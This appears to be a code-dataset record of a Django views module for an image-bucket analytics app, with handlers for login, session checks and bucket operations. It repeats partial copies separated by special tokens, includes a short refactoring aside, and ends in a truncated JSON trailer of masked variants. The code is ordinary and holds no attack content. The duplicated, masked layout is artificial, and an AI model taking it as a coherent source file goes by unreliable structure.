return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def toggle_bucket(request):
"""
Toggles (activates/deactivates) a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data['bucket_id']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].toggle_bucket(bucket_id)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
<|reserved_special_token_0|>
def toggle_mode(request):
"""
Toggles between Tetris/grid.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request.session['analytics'].toggle_mode()
return JsonResponse({})
@require_POST
def grid_set_size(request):
"""
Resizes the grid.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
dim = request_data['dim']
new_size = request_data['new_size']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
new_grid_data = request.session['analytics'].grid_set_size(dim,
new_size)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(new_grid_data, safe=False)
@require_POST
def transfer_images(request):
"""
Transfers (moves/copies) images between buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
images = request_data['images']
bucket_src = request_data['bucket_src']
bucket_dst = request_data['bucket_dst']
mode = request_data['mode']
sort_by = request_data['sort_by']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].transfer_images(images, bucket_src,
bucket_dst, mode)
bucket_view_data = request.session['analytics'].bucket_view_data(
bucket_src, sort_by)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(bucket_view_data, safe=False)
<|reserved_special_token_0|>
@require_POST
def ff_commit(request):
"""
Commits a fast-forward.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
print(request_data)
try:
bucket = request_data['bucket']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].ff_commit(bucket)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
def end_session(request):
"""
Ends an analytic session.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
del request.session['analytics']
response = {'redirect_url': '/main'}
return JsonResponse(response)
<|reserved_special_token_1|>
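Every view in this record repeats the same guard: _check_session_valid() either returns an error response (not logged in, or session data missing) or None, and each handler then unpacks JSON fields inside a try/except KeyError. That boilerplate could be factored into a decorator; the sketch below is framework-free and purely illustrative, with plain dicts and tuples standing in for Django's request and response objects.

from functools import wraps

def require_analytics(view):
    @wraps(view)
    def wrapper(request, *args, **kwargs):
        if not request.get('authenticated'):
            return 403, 'Access denied!'
        if 'analytics' not in request:
            return 400, 'Could not fetch analytic session data.'
        return view(request, *args, **kwargs)
    return wrapper

@require_analytics
def bucket_info(request):
    return 200, request['analytics']

print(bucket_info({'authenticated': True, 'analytics': 'session-data'}))  # (200, 'session-data')
print(bucket_info({'authenticated': False}))                              # (403, 'Access denied!')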
<|reserved_special_token_0|>
def index(request, err_msg=None):
"""
Renders the index page.
"""
template = loader.get_template('aimodel/index.html')
context = {}
context['err_msg'] = err_msg
return HttpResponse(template.render(context, request))
<|reserved_special_token_0|>
def main(request):
"""
Renders the main page behind login.
"""
if not request.user.is_authenticated:
return redirect('/')
template = loader.get_template('aimodel/main.html')
context = dict()
context['datasets'] = DatasetConfigManager.loaded_datasets_list()
return HttpResponse(template.render(context, request))
@require_POST
def analytics_session(request):
"""
Starts a new analytic session.
"""
if not request.user.is_authenticated:
return redirect('/')
try:
dataset = request.POST['dataset']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
if 'analytics' in request.session:
del request.session['analytics']
request.session['analytics'] = AnalyticSession(dataset)
bucket_info = request.session['analytics'].bucket_info()
template = loader.get_template('ui/analytics.html')
context = dict()
context['init_buckets'] = json.dumps(bucket_info['buckets'])
context['init_bucket_ordering'] = json.dumps(bucket_info['bucket_ordering']
)
return HttpResponse(template.render(context, request))
def log_out(request):
"""
Logs the user out.
"""
if request.user.is_authenticated:
logout(request)
return redirect('/')
def _check_session_valid(request):
"""
A helper function checking whether the user is logged in and the session
data is present.
"""
if not request.user.is_authenticated:
return HttpResponseForbidden(reason='Access denied!')
if 'analytics' not in request.session:
err = 'Could not fetch analytic session data.'
return HttpResponseBadRequest(reason=err)
return None
def bucket_info(request):
"""
Fetches information about current buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
return JsonResponse(request.session['analytics'].bucket_info())
<|reserved_special_token_0|>
@require_POST
def rename_bucket(request):
"""
Renames a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data['bucket_id']
new_bucket_name = request_data['new_bucket_name']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].rename_bucket(bucket_id, new_bucket_name)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def swap_buckets(request):
"""
Swaps the position of two buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket1_id = request_data['bucket1_id']
bucket2_id = request_data['bucket2_id']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].swap_buckets(bucket1_id, bucket2_id)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def toggle_bucket(request):
"""
Toggles (activates/deactivates) a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data['bucket_id']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].toggle_bucket(bucket_id)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def interaction_round(request):
"""
Performs an interaction round, providing new image suggestions.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
user_feedback = json.loads(request.body)
try:
suggs = request.session['analytics'].interaction_round(user_feedback)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(suggs, safe=False)
@require_POST
def bucket_view_data(request):
"""
Obtains bucket view data, i.e., the images in the bucket with bucket
confidences.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data['bucket_id']
sort_by = request_data['sort_by']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
bucket_view_data = request.session['analytics'].bucket_view_data(
bucket_id, sort_by)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(bucket_view_data, safe=False)
def toggle_mode(request):
"""
Toggles between Tetris/grid.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request.session['analytics'].toggle_mode()
return JsonResponse({})
@require_POST
def grid_set_size(request):
"""
Resizes the grid.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
dim = request_data['dim']
new_size = request_data['new_size']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
new_grid_data = request.session['analytics'].grid_set_size(dim,
new_size)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(new_grid_data, safe=False)
@require_POST
def transfer_images(request):
"""
Transfers (moves/copies) images between buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
images = request_data['images']
bucket_src = request_data['bucket_src']
bucket_dst = request_data['bucket_dst']
mode = request_data['mode']
sort_by = request_data['sort_by']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].transfer_images(images, bucket_src,
bucket_dst, mode)
bucket_view_data = request.session['analytics'].bucket_view_data(
bucket_src, sort_by)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(bucket_view_data, safe=False)
<|reserved_special_token_0|>
@require_POST
def ff_commit(request):
"""
Commits a fast-forward.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
print(request_data)
try:
bucket = request_data['bucket']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].ff_commit(bucket)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
def end_session(request):
"""
Ends an analytic session.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
del request.session['analytics']
response = {'redirect_url': '/main'}
return JsonResponse(response)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def index(request, err_msg=None):
"""
Renders the index page.
"""
template = loader.get_template('aimodel/index.html')
context = {}
context['err_msg'] = err_msg
return HttpResponse(template.render(context, request))
@require_POST
def log_in(request):
"""
Handles login.
"""
username = request.POST.get('username')
password = request.POST.get('password')
if not username or not password:
return index(request, 'Invalid credentials!')
user = authenticate(username=username, password=password)
if user:
login(request, user)
return redirect('/main')
else:
return index(request, 'Invalid credentials!')
def main(request):
"""
Renders the main page behind login.
"""
if not request.user.is_authenticated:
return redirect('/')
template = loader.get_template('aimodel/main.html')
context = dict()
context['datasets'] = DatasetConfigManager.loaded_datasets_list()
return HttpResponse(template.render(context, request))
@require_POST
def analytics_session(request):
"""
Starts a new analytic session.
"""
if not request.user.is_authenticated:
return redirect('/')
try:
dataset = request.POST['dataset']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
if 'analytics' in request.session:
del request.session['analytics']
request.session['analytics'] = AnalyticSession(dataset)
bucket_info = request.session['analytics'].bucket_info()
template = loader.get_template('ui/analytics.html')
context = dict()
context['init_buckets'] = json.dumps(bucket_info['buckets'])
context['init_bucket_ordering'] = json.dumps(bucket_info['bucket_ordering']
)
return HttpResponse(template.render(context, request))
def log_out(request):
"""
Logs the user out.
"""
if request.user.is_authenticated:
logout(request)
return redirect('/')
def _check_session_valid(request):
"""
A helper function checking whether the user is logged in and the session
data is present.
"""
if not request.user.is_authenticated:
return HttpResponseForbidden(reason='Access denied!')
if 'analytics' not in request.session:
err = 'Could not fetch analytic session data.'
return HttpResponseBadRequest(reason=err)
return None
def bucket_info(request):
"""
Fetches information about current buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
return JsonResponse(request.session['analytics'].bucket_info())
<|reserved_special_token_0|>
@require_POST
def rename_bucket(request):
"""
Renames a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data['bucket_id']
new_bucket_name = request_data['new_bucket_name']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].rename_bucket(bucket_id, new_bucket_name)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def swap_buckets(request):
"""
Swaps the position of two buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket1_id = request_data['bucket1_id']
bucket2_id = request_data['bucket2_id']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].swap_buckets(bucket1_id, bucket2_id)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def toggle_bucket(request):
"""
Toggles (activates/deactivates) a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data['bucket_id']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].toggle_bucket(bucket_id)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def interaction_round(request):
"""
Performs an interaction round, providing new image suggestions.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
user_feedback = json.loads(request.body)
try:
suggs = request.session['analytics'].interaction_round(user_feedback)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(suggs, safe=False)
@require_POST
def bucket_view_data(request):
"""
Obtains bucket view data, i.e., the images in the bucket with bucket
confidences.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data['bucket_id']
sort_by = request_data['sort_by']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
bucket_view_data = request.session['analytics'].bucket_view_data(
bucket_id, sort_by)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(bucket_view_data, safe=False)
def toggle_mode(request):
"""
Toggles between Tetris/grid.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request.session['analytics'].toggle_mode()
return JsonResponse({})
@require_POST
def grid_set_size(request):
"""
Resizes the grid.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
dim = request_data['dim']
new_size = request_data['new_size']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
new_grid_data = request.session['analytics'].grid_set_size(dim,
new_size)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(new_grid_data, safe=False)
@require_POST
def transfer_images(request):
"""
Transfers (moves/copies) images between buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
images = request_data['images']
bucket_src = request_data['bucket_src']
bucket_dst = request_data['bucket_dst']
mode = request_data['mode']
sort_by = request_data['sort_by']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].transfer_images(images, bucket_src,
bucket_dst, mode)
bucket_view_data = request.session['analytics'].bucket_view_data(
bucket_src, sort_by)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(bucket_view_data, safe=False)
<|reserved_special_token_0|>
@require_POST
def ff_commit(request):
"""
Commits a fast-forward.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
print(request_data)
try:
bucket = request_data['bucket']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].ff_commit(bucket)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
def end_session(request):
"""
Ends an analytic session.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
del request.session['analytics']
response = {'redirect_url': '/main'}
return JsonResponse(response)
from django.contrib.auth import authenticate, login, logout
from django.template import loader
from django.http import (HttpResponse, JsonResponse,
HttpResponseForbidden, HttpResponseBadRequest)
from django.shortcuts import redirect
from django.views.decorators.http import require_POST
import json
from aimodel.AnalyticSession import AnalyticSession
from data.DatasetConfigManager import DatasetConfigManager
def index(request, err_msg=None):
"""
Renders the index page.
"""
template = loader.get_template("aimodel/index.html")
context = {}
context["err_msg"] = err_msg
return HttpResponse(template.render(context, request))
@require_POST
def log_in(request):
"""
Handles login.
"""
# Get the username and password
username = request.POST.get("username")
password = request.POST.get("password")
if not username or not password:
return index(request, "Invalid credentials!")
# Authenticate and log in
user = authenticate(username=username, password=password)
if user:
login(request, user)
return redirect("/main")
else:
return index(request, "Invalid credentials!")
def main(request):
"""
Renders the main page behind login.
"""
if not request.user.is_authenticated:
return redirect("/")
template = loader.get_template("aimodel/main.html")
context = dict()
context["datasets"] = DatasetConfigManager.loaded_datasets_list()
return HttpResponse(template.render(context, request))
@require_POST
def analytics_session(request):
"""
Starts a new analytic session.
"""
if not request.user.is_authenticated:
return redirect("/")
try:
dataset = request.POST["dataset"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
if "analytics" in request.session:
del request.session["analytics"]
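    # Note: storing an AnalyticSession instance on the session assumes a session
    # serializer that can persist arbitrary Python objects (e.g. pickle-based).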
request.session["analytics"] = AnalyticSession(dataset)
bucket_info = request.session["analytics"].bucket_info()
template = loader.get_template("ui/analytics.html")
context = dict()
context["init_buckets"] = json.dumps(bucket_info["buckets"])
context["init_bucket_ordering"] =\
json.dumps(bucket_info["bucket_ordering"])
return HttpResponse(template.render(context, request))
def log_out(request):
"""
Logs the user out.
"""
if request.user.is_authenticated:
logout(request)
return redirect("/")
def _check_session_valid(request):
"""
A helper function checking whether the user is logged in and the session
data is present.
"""
if not request.user.is_authenticated:
return HttpResponseForbidden(reason="Access denied!")
if "analytics" not in request.session:
err = "Could not fetch analytic session data."
return HttpResponseBadRequest(reason=err)
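    # A None return signals a valid session; callers return any non-None response as-is.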
return None
def bucket_info(request):
"""
Fetches information about current buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
return JsonResponse(request.session["analytics"].bucket_info())
def create_bucket(request):
"""
Creates a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
try:
request.session["analytics"].create_bucket()
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def delete_bucket(request):
"""
Deletes a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data["bucket_id"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
try:
request.session["analytics"].delete_bucket(bucket_id)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def rename_bucket(request):
"""
Renames a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data["bucket_id"]
new_bucket_name = request_data["new_bucket_name"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
try:
request.session["analytics"].rename_bucket(bucket_id, new_bucket_name)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def swap_buckets(request):
"""
Swaps the position of two buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket1_id = request_data["bucket1_id"]
bucket2_id = request_data["bucket2_id"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
try:
request.session["analytics"].swap_buckets(bucket1_id, bucket2_id)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def toggle_bucket(request):
"""
Toggles (activates/deactivates) a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data["bucket_id"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
try:
request.session["analytics"].toggle_bucket(bucket_id)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def interaction_round(request):
"""
Performs an interaction round, providing new image suggestions.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
user_feedback = json.loads(request.body)
try:
suggs = request.session["analytics"].interaction_round(user_feedback)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(suggs, safe=False)
@require_POST
def bucket_view_data(request):
"""
Obtains bucket view data, i.e., the images in the bucket with bucket
confidences.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data["bucket_id"]
sort_by = request_data["sort_by"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
try:
bucket_view_data =\
request.session["analytics"].bucket_view_data(bucket_id, sort_by)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(bucket_view_data, safe=False)
def toggle_mode(request):
"""
Toggles between Tetris/grid.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
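    # toggle_mode() mutates the session-stored object in place; depending on session
    # settings, request.session.modified may need to be set for the change to persist.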
request.session["analytics"].toggle_mode()
return JsonResponse({})
@require_POST
def grid_set_size(request):
"""
Resizes the grid.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
dim = request_data["dim"]
new_size = request_data["new_size"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
try:
new_grid_data = request.session["analytics"].grid_set_size(dim,
new_size)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(new_grid_data, safe=False)
@require_POST
def transfer_images(request):
"""
Transfers (moves/copies) images between buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
images = request_data["images"]
bucket_src = request_data["bucket_src"]
bucket_dst = request_data["bucket_dst"]
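        # "mode" selects move vs. copy semantics (per the docstring); invalid values
        # are expected to surface as ValueError below and map to a 400 response.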
mode = request_data["mode"]
sort_by = request_data["sort_by"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
try:
request.session["analytics"].transfer_images(images,
bucket_src, bucket_dst,
mode)
bucket_view_data =\
request.session["analytics"].bucket_view_data(bucket_src, sort_by)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(bucket_view_data, safe=False)
@require_POST
def fast_forward(request):
"""
Fast-forwards a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket = request_data["bucket"]
n_ff = request_data["n_ff"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
try:
request.session["analytics"].fast_forward(bucket, n_ff)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def ff_commit(request):
"""
Commits a fast-forward.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket = request_data["bucket"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
try:
request.session["analytics"].ff_commit(bucket)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
def end_session(request):
"""
Ends an analytic session.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
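    # Deleting the key marks the session as modified, so the removal is persisted.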
del request.session["analytics"]
response = {
"redirect_url": "/main"
}
return JsonResponse(response)
|
flexible
|
{
"blob_id": "41ca762fe6865613ae4ef2f657f86b516353676f",
"index": 9784,
"step-1": "<mask token>\n\n\ndef index(request, err_msg=None):\n \"\"\"\n Renders the index page.\n \"\"\"\n template = loader.get_template('aimodel/index.html')\n context = {}\n context['err_msg'] = err_msg\n return HttpResponse(template.render(context, request))\n\n\n<mask token>\n\n\n@require_POST\ndef analytics_session(request):\n \"\"\"\n Starts a new analytic session.\n \"\"\"\n if not request.user.is_authenticated:\n return redirect('/')\n try:\n dataset = request.POST['dataset']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n if 'analytics' in request.session:\n del request.session['analytics']\n request.session['analytics'] = AnalyticSession(dataset)\n bucket_info = request.session['analytics'].bucket_info()\n template = loader.get_template('ui/analytics.html')\n context = dict()\n context['init_buckets'] = json.dumps(bucket_info['buckets'])\n context['init_bucket_ordering'] = json.dumps(bucket_info['bucket_ordering']\n )\n return HttpResponse(template.render(context, request))\n\n\ndef log_out(request):\n \"\"\"\n Logs the user out.\n \"\"\"\n if request.user.is_authenticated:\n logout(request)\n return redirect('/')\n\n\ndef _check_session_valid(request):\n \"\"\"\n A helper function checking whether the user is logged in and the session\n data is present.\n \"\"\"\n if not request.user.is_authenticated:\n return HttpResponseForbidden(reason='Access denied!')\n if 'analytics' not in request.session:\n err = 'Could not fetch analytic session data.'\n return HttpResponseBadRequest(reason=err)\n return None\n\n\ndef bucket_info(request):\n \"\"\"\n Fetches information about current buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n return JsonResponse(request.session['analytics'].bucket_info())\n\n\n<mask token>\n\n\n@require_POST\ndef rename_bucket(request):\n \"\"\"\n Renames a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n new_bucket_name = request_data['new_bucket_name']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].rename_bucket(bucket_id, new_bucket_name)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef swap_buckets(request):\n \"\"\"\n Swaps the position of two buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket1_id = request_data['bucket1_id']\n bucket2_id = request_data['bucket2_id']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].swap_buckets(bucket1_id, bucket2_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef toggle_bucket(request):\n \"\"\"\n Toggles (activates/deactivates) a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].toggle_bucket(bucket_id)\n except ValueError as e:\n return 
HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n<mask token>\n\n\ndef toggle_mode(request):\n \"\"\"\n Toggles between Tetris/grid.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request.session['analytics'].toggle_mode()\n return JsonResponse({})\n\n\n@require_POST\ndef grid_set_size(request):\n \"\"\"\n Resizes the grid.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n dim = request_data['dim']\n new_size = request_data['new_size']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n new_grid_data = request.session['analytics'].grid_set_size(dim,\n new_size)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(new_grid_data, safe=False)\n\n\n@require_POST\ndef transfer_images(request):\n \"\"\"\n Transfers (moves/copies) images between buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n images = request_data['images']\n bucket_src = request_data['bucket_src']\n bucket_dst = request_data['bucket_dst']\n mode = request_data['mode']\n sort_by = request_data['sort_by']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].transfer_images(images, bucket_src,\n bucket_dst, mode)\n bucket_view_data = request.session['analytics'].bucket_view_data(\n bucket_src, sort_by)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(bucket_view_data, safe=False)\n\n\n<mask token>\n\n\n@require_POST\ndef ff_commit(request):\n \"\"\"\n Commits a fast-forward.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n print(request_data)\n try:\n bucket = request_data['bucket']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].ff_commit(bucket)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\ndef end_session(request):\n \"\"\"\n Ends an analytic session.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n del request.session['analytics']\n response = {'redirect_url': '/main'}\n return JsonResponse(response)\n",
"step-2": "<mask token>\n\n\ndef index(request, err_msg=None):\n \"\"\"\n Renders the index page.\n \"\"\"\n template = loader.get_template('aimodel/index.html')\n context = {}\n context['err_msg'] = err_msg\n return HttpResponse(template.render(context, request))\n\n\n<mask token>\n\n\ndef main(request):\n \"\"\"\n Renders the main page behind login.\n \"\"\"\n if not request.user.is_authenticated:\n return redirect('/')\n template = loader.get_template('aimodel/main.html')\n context = dict()\n context['datasets'] = DatasetConfigManager.loaded_datasets_list()\n return HttpResponse(template.render(context, request))\n\n\n@require_POST\ndef analytics_session(request):\n \"\"\"\n Starts a new analytic session.\n \"\"\"\n if not request.user.is_authenticated:\n return redirect('/')\n try:\n dataset = request.POST['dataset']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n if 'analytics' in request.session:\n del request.session['analytics']\n request.session['analytics'] = AnalyticSession(dataset)\n bucket_info = request.session['analytics'].bucket_info()\n template = loader.get_template('ui/analytics.html')\n context = dict()\n context['init_buckets'] = json.dumps(bucket_info['buckets'])\n context['init_bucket_ordering'] = json.dumps(bucket_info['bucket_ordering']\n )\n return HttpResponse(template.render(context, request))\n\n\ndef log_out(request):\n \"\"\"\n Logs the user out.\n \"\"\"\n if request.user.is_authenticated:\n logout(request)\n return redirect('/')\n\n\ndef _check_session_valid(request):\n \"\"\"\n A helper function checking whether the user is logged in and the session\n data is present.\n \"\"\"\n if not request.user.is_authenticated:\n return HttpResponseForbidden(reason='Access denied!')\n if 'analytics' not in request.session:\n err = 'Could not fetch analytic session data.'\n return HttpResponseBadRequest(reason=err)\n return None\n\n\ndef bucket_info(request):\n \"\"\"\n Fetches information about current buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n return JsonResponse(request.session['analytics'].bucket_info())\n\n\n<mask token>\n\n\n@require_POST\ndef rename_bucket(request):\n \"\"\"\n Renames a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n new_bucket_name = request_data['new_bucket_name']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].rename_bucket(bucket_id, new_bucket_name)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef swap_buckets(request):\n \"\"\"\n Swaps the position of two buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n 